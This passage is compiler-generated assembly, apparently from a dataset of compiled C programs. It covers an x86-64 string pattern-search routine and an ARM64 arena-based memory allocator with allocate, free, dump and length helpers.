-12(%rbp) movl $0, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %ecx addl $-1, %ecx movl %ecx, -12(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -21(%rbp) ## 1-byte Spill je LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 callq _getchar movl %eax, %ecx movl %ecx, -20(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, %ecx movb %al, -21(%rbp) ## 1-byte Spill je LBB1_4 ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 cmpl $10, -20(%rbp) setne %al movb %al, -21(%rbp) ## 1-byte Spill LBB1_4: ## in Loop: Header=BB1_1 Depth=1 movb -21(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_5 jmp LBB1_6 LBB1_5: ## in Loop: Header=BB1_1 Depth=1 movl -20(%rbp), %eax movb %al, %dl movq -8(%rbp), %rax movl -16(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -16(%rbp) movslq %ecx, %rcx movb %dl, (%rax,%rcx) jmp LBB1_1 LBB1_6: movq -8(%rbp), %rax movslq -16(%rbp), %rcx movb $0, (%rax,%rcx) movl -16(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _strindex ## -- Begin function strindex .p2align 4, 0x90 _strindex: ## @strindex .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq -16(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -28(%rbp) movq -24(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -32(%rbp) movl -28(%rbp), %eax subl $1, %eax movl %eax, -36(%rbp) LBB2_1: ## =>This Loop Header: Depth=1 ## Child Loop BB2_3 Depth 2 cmpl $0, -36(%rbp) jle LBB2_12 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -32(%rbp), %eax subl $1, %eax movl %eax, -40(%rbp) movl $0, -44(%rbp) LBB2_3: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -40(%rbp) movb %al, -45(%rbp) ## 1-byte Spill jl LBB2_5 ## %bb.4: ## in Loop: Header=BB2_3 Depth=2 movq -16(%rbp), %rax movl -36(%rbp), %ecx subl -44(%rbp), %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax movq -24(%rbp), %rcx movslq -40(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax sete %al movb %al, -45(%rbp) ## 1-byte Spill LBB2_5: ## in Loop: Header=BB2_3 Depth=2 movb -45(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB2_6 jmp LBB2_8 LBB2_6: ## in Loop: Header=BB2_3 Depth=2 jmp LBB2_7 LBB2_7: ## in Loop: Header=BB2_3 Depth=2 movl -40(%rbp), %eax addl $-1, %eax movl %eax, -40(%rbp) movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB2_3 LBB2_8: ## in Loop: Header=BB2_1 Depth=1 cmpl $-1, -40(%rbp) jne LBB2_10 ## %bb.9: movl -36(%rbp), %eax subl -32(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB2_13 LBB2_10: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_11 LBB2_11: ## in Loop: Header=BB2_1 Depth=1 movl -36(%rbp), %eax addl $-1, %eax movl %eax, -36(%rbp) jmp LBB2_1 LBB2_12: movl $-1, -4(%rbp) LBB2_13: movl -4(%rbp), %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Input the pattern: " L_.str.1: ## @.str.1 .asciz "Input some strings:\n" L_.str.2: ## @.str.2 .asciz "Result: %d\n" .subsections_via_symbols
the_stack_data/234517001.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _INITIALIZE ; -- Begin function INITIALIZE .p2align 2 _INITIALIZE: ; @INITIALIZE .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _N@GOTPAGE ldr x8, [x8, _N@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill ldr w8, [x8] mov x0, x8 mov x1, #1 bl _calloc ldr x8, [sp, #8] ; 8-byte Folded Reload adrp x9, _Arena@GOTPAGE ldr x9, [x9, _Arena@GOTPAGEOFF] str x0, [x9] ldr w8, [x8] mov x0, x8 mov x1, #4 bl _calloc adrp x8, _empty@GOTPAGE ldr x8, [x8, _empty@GOTPAGEOFF] str x0, [x8] adrp x8, _START_BLOC@GOTPAGE ldr x8, [x8, _START_BLOC@GOTPAGEOFF] str wzr, [x8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _FINALIZE ; -- Begin function FINALIZE .p2align 2 _FINALIZE: ; @FINALIZE .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _Arena@GOTPAGE ldr x8, [x8, _Arena@GOTPAGEOFF] ldr x0, [x8] bl _free adrp x8, _empty@GOTPAGE ldr x8, [x8, _empty@GOTPAGEOFF] ldr x0, [x8] bl _free ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _DUMP ; -- Begin function DUMP .p2align 2 _DUMP: ; @DUMP .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _N@GOTPAGE ldr x8, [x8, _N@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill ldr w8, [x8] subs w8, w8, #0 cset w8, ls tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: mov x8, sp str xzr, [x8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB2_2 LBB2_2: stur wzr, [x29, #-4] b LBB2_3 LBB2_3: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldur w8, [x29, #-4] ldr w9, [x9] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB2_14 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=1 adrp x8, _Arena@GOTPAGE ldr x8, [x8, _Arena@GOTPAGEOFF] ldr x8, [x8] ldur w9, [x29, #-4] ; kill: def $x9 killed $w9 ldrb w10, [x8, x9] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w8, [x29, #-4] add w8, w8, #1 mov w10, #8 udiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_7 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_3 Depth=1 ldur w8, [x29, #-4] add w8, w8, #1 mov w10, #16 udiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_7 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_3 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB2_7 LBB2_7: ; in Loop: Header=BB2_3 Depth=1 ldur w8, [x29, #-4] add w8, w8, #1 mov w10, #16 udiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_12 b LBB2_8 LBB2_8: ; in Loop: Header=BB2_3 Depth=1 ldur w8, [x29, #-4] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_12 b LBB2_9 LBB2_9: ; in Loop: Header=BB2_3 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldr x9, [sp, #16] ; 8-byte Folded Reload ldur w8, [x29, #-4] add w8, w8, #1 ldr w9, [x9] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB2_11 b LBB2_10 LBB2_10: ; in Loop: Header=BB2_3 Depth=1 ldur w8, [x29, #-4] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB2_11 LBB2_11: ; in Loop: Header=BB2_3 Depth=1 b LBB2_12 LBB2_12: ; in Loop: Header=BB2_3 Depth=1 b LBB2_13 LBB2_13: ; in Loop: Header=BB2_3 Depth=1 ldur w8, [x29, #-4] add w8, w8, #1 stur w8, [x29, #-4] b LBB2_3 LBB2_14: ldr x8, [sp, #16] ; 8-byte Folded Reload ldr w8, [x8] mov w10, #16 udiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_16 b LBB2_15 LBB2_15: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB2_16 LBB2_16: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _write ; -- Begin function write .p2align 2 _write: ; @write .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str w0, [sp, #28] str w1, [sp, #24] str w2, [sp, #20] mov w8, #-1 str w8, [sp, #12] ldr w8, [sp, #28] str w8, [sp, #16] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldr w9, [sp, #24] subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB3_4 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] ldr w8, [sp, #12] mov x9, x8 add x8, sp, #20 add x8, x8, x9 ldrb w8, [x8] adrp x9, _Arena@GOTPAGE ldr x9, [x9, _Arena@GOTPAGEOFF] ldr x9, [x9] ldr w10, [sp, #16] ; kill: def $x10 killed $w10 add x9, x9, x10 strb w8, [x9] b LBB3_3 LBB3_3: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB3_1 LBB3_4: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _ALLOC ; -- Begin function ALLOC .p2align 2 _ALLOC: ; @ALLOC .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _N@GOTPAGE ldr x8, [x8, _N@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill adrp x8, _empty@GOTPAGE ldr x8, [x8, _empty@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill adrp x8, _ind_start@GOTPAGE ldr x8, [x8, _ind_start@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill adrp x8, _START_BLOC@GOTPAGE ldr x8, [x8, _START_BLOC@GOTPAGEOFF] str x8, [sp, #32] ; 8-byte Folded Spill adrp x8, _nr_bloc@GOTPAGE ldr x8, [x8, _nr_bloc@GOTPAGEOFF] str x8, [sp, #40] ; 8-byte Folded Spill stur w0, [x29, #-4] ldur w8, [x29, #-4] add w8, w8, #12 stur w8, [x29, #-28] stur wzr, [x29, #-12] sturb wzr, [x29, #-29] stur wzr, [x29, #-8] b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #8] ; 8-byte Folded Reload ldur w8, [x29, #-8] ldr w9, [x9] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB4_11 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldur w9, [x29, #-8] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_3 LBB4_3: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] ldur w8, [x29, #-12] ldur w9, [x29, #-28] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB4_5 b LBB4_4 LBB4_4: mov w8, #1 sturb w8, [x29, #-29] b LBB4_11 LBB4_5: ; in Loop: Header=BB4_1 Depth=1 b LBB4_9 LBB4_6: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-12] ldur w9, [x29, #-28] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB4_8 b LBB4_7 LBB4_7: ; in Loop: Header=BB4_1 Depth=1 stur wzr, [x29, #-12] b LBB4_8 LBB4_8: ; in Loop: Header=BB4_1 Depth=1 b LBB4_9 LBB4_9: ; in Loop: Header=BB4_1 Depth=1 b LBB4_10 LBB4_10: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB4_1 LBB4_11: ldurb w8, [x29, #-29] tbz w8, #0, LBB4_70 b LBB4_12 LBB4_12: ldr x9, [sp, #32] ; 8-byte Folded Reload ldr x10, [sp, #24] ; 8-byte Folded Reload ldur w8, [x29, #-8] stur w8, [x29, #-16] ldur w8, [x29, #-16] ldur w11, [x29, #-28] subs w8, w8, w11 add w8, w8, #1 str w8, [x10] ldur w8, [x29, #-16] ldr w9, [x9] subs w8, w8, w9 cset w8, lo tbnz w8, #0, LBB4_14 b LBB4_13 LBB4_13: ldr x9, [sp, #32] ; 8-byte Folded Reload ldur w8, [x29, #-16] ldur w10, [x29, #-28] subs w8, w8, w10 add w8, w8, #1 ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB4_23 b LBB4_14 LBB4_14: sturb wzr, [x29, #-30] ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_15 LBB4_15: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #8] ; 8-byte Folded Reload ldur w8, [x29, #-20] ldr w9, [x9] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB4_20 b LBB4_16 LBB4_16: ; in Loop: Header=BB4_15 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_18 b LBB4_17 LBB4_17: mov w8, #1 sturb w8, [x29, #-30] b LBB4_20 LBB4_18: ; in Loop: Header=BB4_15 Depth=1 b LBB4_19 LBB4_19: ; in Loop: Header=BB4_15 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_15 LBB4_20: ldurb w8, [x29, #-30] and w8, w8, #0x1 subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB4_22 b LBB4_21 LBB4_21: ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w0, [x8] ldr w8, [x8] add w1, w8, #3 ldur w2, [x29, #-20] bl _write b LBB4_22 LBB4_22: ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x10, [sp, #32] ; 8-byte Folded Reload ldur w9, [x29, #-16] ldur w11, [x29, #-28] subs w9, w9, w11 add w9, w9, #1 str w9, [x10] ldr w9, [x8] add w0, w9, #8 ldr w8, [x8] add w1, w8, #11 ldur w2, [x29, #-4] bl _write b LBB4_65 LBB4_23: mov w8, #1 sturb w8, [x29, #-30] ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_24 LBB4_24: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #8] ; 8-byte Folded Reload ldur w8, [x29, #-20] ldr w9, [x9] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB4_29 b LBB4_25 LBB4_25: ; in Loop: Header=BB4_24 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_27 b LBB4_26 LBB4_26: sturb wzr, [x29, #-30] b LBB4_29 LBB4_27: ; in Loop: Header=BB4_24 Depth=1 b LBB4_28 LBB4_28: ; in Loop: Header=BB4_24 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_24 LBB4_29: ldurb w8, [x29, #-30] and w8, w8, #0x1 subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB4_44 b LBB4_30 LBB4_30: ldr x8, [sp, #24] ; 8-byte Folded Reload sturb wzr, [x29, #-30] ldr w8, [x8] subs w8, w8, #1 stur w8, [x29, #-20] b LBB4_31 LBB4_31: ; =>This Inner Loop Header: Depth=1 ldurb w8, [x29, #-30] tbnz w8, #0, LBB4_36 b LBB4_32 LBB4_32: ; in Loop: Header=BB4_31 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_34 b LBB4_33 LBB4_33: ; in Loop: Header=BB4_31 Depth=1 mov w8, #1 sturb w8, [x29, #-30] b LBB4_34 LBB4_34: ; in Loop: Header=BB4_31 Depth=1 b LBB4_35 LBB4_35: ; in Loop: Header=BB4_31 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #1 stur w8, [x29, #-20] b LBB4_31 LBB4_36: ldur w8, [x29, #-20] stur w8, [x29, #-24] b LBB4_37 LBB4_37: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [x9] ldur w10, [x29, #-20] ; kill: def $x10 killed $w10 ldr w8, [x8, x10, lsl #2] ldr x9, [x9] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB4_41 b LBB4_38 LBB4_38: ; in Loop: Header=BB4_37 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB4_40 b LBB4_39 LBB4_39: b LBB4_41 LBB4_40: ; in Loop: Header=BB4_37 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #1 stur w8, [x29, #-20] b LBB4_37 LBB4_41: ldur w8, [x29, #-20] stur w8, [x29, #-36] ldur w8, [x29, #-36] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_43 b LBB4_42 LBB4_42: ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB4_43 LBB4_43: ldr x8, [sp, #24] ; 8-byte Folded Reload ldur w0, [x29, #-36] ldur w9, [x29, #-36] add w1, w9, #3 ldr w2, [x8] bl _write ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w9, [x8] add w0, w9, #4 ldr w8, [x8] add w1, w8, #7 ldur w2, [x29, #-36] bl _write ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w9, [x8] add w0, w9, #8 ldr w8, [x8] add w1, w8, #11 ldur w2, [x29, #-4] bl _write b LBB4_64 LBB4_44: ldr x8, [sp, #24] ; 8-byte Folded Reload sturb wzr, [x29, #-30] ldr w8, [x8] subs w8, w8, #1 stur w8, [x29, #-20] b LBB4_45 LBB4_45: ; =>This Inner Loop Header: Depth=1 ldurb w8, [x29, #-30] tbnz w8, #0, LBB4_50 b LBB4_46 LBB4_46: ; in Loop: Header=BB4_45 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_48 b LBB4_47 LBB4_47: ; in Loop: Header=BB4_45 Depth=1 mov w8, #1 sturb w8, [x29, #-30] b LBB4_48 LBB4_48: ; in Loop: Header=BB4_45 Depth=1 b LBB4_49 LBB4_49: ; in Loop: Header=BB4_45 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #1 stur w8, [x29, #-20] b LBB4_45 LBB4_50: ldur w8, [x29, #-20] stur w8, [x29, #-24] b LBB4_51 LBB4_51: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [x9] ldur w10, [x29, #-20] ; kill: def $x10 killed $w10 ldr w8, [x8, x10, lsl #2] ldr x9, [x9] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB4_55 b LBB4_52 LBB4_52: ; in Loop: Header=BB4_51 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB4_54 b LBB4_53 LBB4_53: b LBB4_55 LBB4_54: ; in Loop: Header=BB4_51 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #1 stur w8, [x29, #-20] b LBB4_51 LBB4_55: ldur w8, [x29, #-20] stur w8, [x29, #-40] ldur w8, [x29, #-40] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_57 b LBB4_56 LBB4_56: ldur w8, [x29, #-40] add w8, w8, #1 stur w8, [x29, #-40] b LBB4_57 LBB4_57: ldr x8, [sp, #24] ; 8-byte Folded Reload ldur w0, [x29, #-40] ldur w9, [x29, #-40] add w1, w9, #3 ldr w2, [x8] bl _write ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w9, [x8] add w0, w9, #4 ldr w8, [x8] add w1, w8, #7 ldur w2, [x29, #-40] bl _write ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_58 LBB4_58: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #8] ; 8-byte Folded Reload ldur w8, [x29, #-20] ldr w9, [x9] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB4_63 b LBB4_59 LBB4_59: ; in Loop: Header=BB4_58 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x8, [x8] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_61 b LBB4_60 LBB4_60: b LBB4_63 LBB4_61: ; in Loop: Header=BB4_58 Depth=1 b LBB4_62 LBB4_62: ; in Loop: Header=BB4_58 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_58 LBB4_63: ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w0, [x8] ldr w8, [x8] add w1, w8, #3 ldur w2, [x29, #-20] bl _write ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w9, [x8] add w0, w9, #8 ldr w8, [x8] add w1, w8, #11 ldur w2, [x29, #-4] bl _write ldr x8, [sp, #24] ; 8-byte Folded Reload ldur w9, [x29, #-20] add w0, w9, #4 ldur w9, [x29, #-20] add w1, w9, #7 ldr w2, [x8] bl _write b LBB4_64 LBB4_64: b LBB4_65 LBB4_65: ldur w8, [x29, #-16] ldur w9, [x29, #-4] subs w8, w8, w9 add w8, w8, #1 stur w8, [x29, #-44] ldur w9, [x29, #-44] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldr x10, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #24] ; 8-byte Folded Reload ldr w9, [x10] add w9, w9, #1 str w9, [x10] ldr w8, [x8] stur w8, [x29, #-8] b LBB4_66 LBB4_66: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-8] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB4_69 b LBB4_67 LBB4_67: ; in Loop: Header=BB4_66 Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [sp, #40] ; 8-byte Folded Reload ldr w8, [x8] ldr x9, [x9] ldur w10, [x29, #-8] ; kill: def $x10 killed $w10 str w8, [x9, x10, lsl #2] b LBB4_68 LBB4_68: ; in Loop: Header=BB4_66 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB4_66 LBB4_69: b LBB4_71 LBB4_70: adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB4_71 LBB4_71: ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _Length ; -- Begin function Length .p2align 2 _Length: ; @Length .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur w1, [x29, #-8] str wzr, [sp, #16] str wzr, [sp, #8] ldur w8, [x29, #-4] str w8, [sp, #12] b LBB5_1 LBB5_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB5_4 b LBB5_2 LBB5_2: ; in Loop: Header=BB5_1 Depth=1 adrp x8, _Arena@GOTPAGE ldr x8, [x8, _Arena@GOTPAGEOFF] ldr x8, [x8] ldr w9, [sp, #12] ; kill: def $x9 killed $w9 ldrb w8, [x8, x9] stur w8, [x29, #-12] ldur s1, [x29, #-12] ; implicit-def: $d0 fmov s0, s1 ucvtf d0, d0 str d0, [sp] ; 8-byte Folded Spill ldr w9, [sp, #8] mov w8, #2 mul w8, w8, w9 ucvtf d1, w8 fmov d0, #16.00000000 bl _pow fmov d1, d0 ldr d0, [sp] ; 8-byte Folded Reload ldr s3, [sp, #16] ; implicit-def: $d2 fmov s2, s3 ucvtf d2, d2 fmadd d0, d0, d1, d2 fcvtzu w8, d0 str w8, [sp, #16] ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB5_3 LBB5_3: ; in Loop: Header=BB5_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB5_1 LBB5_4: ldr w0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _FREE ; -- Begin function FREE .p2align 2 _FREE: ; @FREE .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _START_BLOC@GOTPAGE ldr x8, [x8, _START_BLOC@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill stur w0, [x29, #-4] ldur w8, [x29, #-4] subs w0, w8, #12 ldur w8, [x29, #-4] subs w1, w8, #9 bl _Length str w0, [sp, #16] ldur w8, [x29, #-4] subs w0, w8, #8 ldur w8, [x29, #-4] subs w1, w8, #5 bl _Length str w0, [sp, #12] ldur w8, [x29, #-4] subs w0, w8, #4 ldur w8, [x29, #-4] subs w1, w8, #1 bl _Length ldr x9, [sp] ; 8-byte Folded Reload str w0, [sp, #8] ldur w8, [x29, #-4] subs w8, w8, #12 stur w8, [x29, #-12] ldur w8, [x29, #-4] subs w8, w8, #12 ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB6_2 b LBB6_1 LBB6_1: ldr x8, [sp] ; 8-byte Folded Reload ldr w9, [sp, #16] str w9, [x8] ldr w9, [x8] add w0, w9, #4 ldr w8, [x8] add w1, w8, #7 mov w2, #0 bl _write b LBB6_3 LBB6_2: ldr w0, [sp, #12] ldr w8, [sp, #12] add w1, w8, #3 ldr w2, [sp, #16] bl _write ldr w8, [sp, #16] add w0, w8, #4 ldr w8, [sp, #16] add w1, w8, #7 ldr w2, [sp, #12] bl _write b LBB6_3 LBB6_3: ldur w8, [x29, #-12] stur w8, [x29, #-8] b LBB6_4 LBB6_4: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-8] ldur w9, [x29, #-4] ldr w10, [sp, #8] add w9, w9, w10 subs w9, w9, #1 subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB6_7 b LBB6_5 LBB6_5: ; in Loop: Header=BB6_4 Depth=1 adrp x8, _empty@GOTPAGE ldr x8, [x8, _empty@GOTPAGEOFF] ldr x9, [x8] ldur w8, [x29, #-8] mov x10, x8 mov w8, #0 str w8, [x9, x10, lsl #2] adrp x8, _Arena@GOTPAGE ldr x8, [x8, _Arena@GOTPAGEOFF] ldr x8, [x8] ldur w9, [x29, #-8] ; kill: def $x9 killed $w9 add x8, x8, x9 strb wzr, [x8] b LBB6_6 LBB6_6: ; in Loop: Header=BB6_4 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB6_4 LBB6_7: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload 